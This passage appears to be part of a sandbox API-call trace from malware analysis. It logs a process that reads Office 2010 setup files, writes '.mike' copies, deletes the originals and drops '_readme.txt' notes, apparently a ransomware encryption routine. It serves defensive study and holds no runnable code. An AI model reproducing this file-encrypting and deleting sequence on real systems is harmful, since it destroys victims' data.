Controller\\Access.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.549] GetFileType (hFile=0x288) returned 0x1 [0052.549] GetFileType (hFile=0x288) returned 0x1 [0052.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.551] GetFileType (hFile=0x288) returned 0x1 [0052.551] GetFileType (hFile=0x288) returned 0x1 [0052.551] CloseHandle (hObject=0x288) returned 1 [0052.551] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.551] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.551] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0052.551] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.552] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b9188 | out: lpFileInformation=0x21b9188*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.552] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b9544 | out: lpFileInformation=0x21b9544*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.552] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.553] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.553] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.553] GetFileType (hFile=0x288) returned 0x1 [0052.553] GetFileType (hFile=0x288) returned 0x1 [0052.553] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.554] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ba220 | out: lpFileInformation=0x21ba220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0052.554] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.554] GetFileType (hFile=0x288) returned 0x1 [0052.554] GetFileType (hFile=0x288) returned 0x1 [0052.555] ReadFile (in: hFile=0x288, lpBuffer=0x21bb994, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21bb994*, lpNumberOfBytesRead=0x2af038*=0x333, lpOverlapped=0x0) returned 1 [0052.556] CloseHandle (hObject=0x288) returned 1 [0052.556] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.556] GetFileType (hFile=0x288) returned 0x1 [0052.556] GetFileType (hFile=0x288) returned 0x1 [0052.556] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.556] WriteFile (in: hFile=0x288, lpBuffer=0x21bfbfc*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21bfbfc*, lpNumberOfBytesWritten=0x2af02c*=0x340, lpOverlapped=0x0) returned 1 [0052.557] CloseHandle (hObject=0x288) returned 1 [0052.558] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.558] GetFileType (hFile=0x288) returned 0x1 [0052.558] GetFileType (hFile=0x288) returned 0x1 [0052.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.559] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89d7040, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89d7040, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0052.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike", lpFilePart=0x0) returned 0x72 [0052.559] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21c4874 | out: lpFileInformation=0x21c4874*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89d7040, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89d7040, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0052.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", dwFileAttributes=0x80) returned 1 [0052.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.560] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1 [0052.561] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.561] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.561] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpFilePart=0x0) returned 0x6d [0052.561] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt", lpFilePart=0x0) returned 0x68 [0052.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.562] GetFileType (hFile=0x288) returned 0x1 [0052.562] GetFileType (hFile=0x288) returned 0x1 [0052.562] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.563] GetFileType (hFile=0x288) returned 0x1 [0052.564] GetFileType (hFile=0x288) returned 0x1 [0052.564] CloseHandle (hObject=0x288) returned 1 [0052.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.564] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0052.564] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.564] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c8890 | out: lpFileInformation=0x21c8890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0052.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.564] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c8c24 | out: lpFileInformation=0x21c8c24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0052.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.564] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 